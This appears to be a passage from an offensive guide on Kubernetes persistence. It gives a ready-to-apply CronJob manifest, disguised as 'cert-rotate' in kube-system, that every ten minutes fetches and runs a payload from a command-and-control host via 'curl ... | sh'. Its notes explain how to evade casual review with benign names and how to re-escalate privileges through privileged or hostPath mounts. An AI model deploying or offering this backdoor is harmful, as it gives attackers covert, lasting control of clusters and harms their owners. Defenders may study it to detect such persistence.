A CronJob schedules a job to run on an interval. As persistence it is a periodic callback: even if every running pod is cleaned up, the CronJob re-launches attacker code at the next tick. A short schedule and a benign name make it a reliable, low-profile beacon.
kubectl apply -f - <<'YAML'
apiVersion: batch/v1
kind: CronJob
metadata: { name: cert-rotate, namespace: kube-system }
spec:
schedule: "*/10 * * * *"
jobTemplate:
spec:
template:
spec:
restartPolicy: Never
containers: [{ name: c, image: alpine, command: ["sh","-c","curl -s http://c2/x | sh"] }]
YAML
Exploitation notes#
- The CronJob survives pod cleanup and node reboots; it only needs the API object to persist.
- A name like
cert-rotateorbackupinkube-systempasses casual review. - Mount a privileged or hostPath volume in the job template to re-escalate on each run.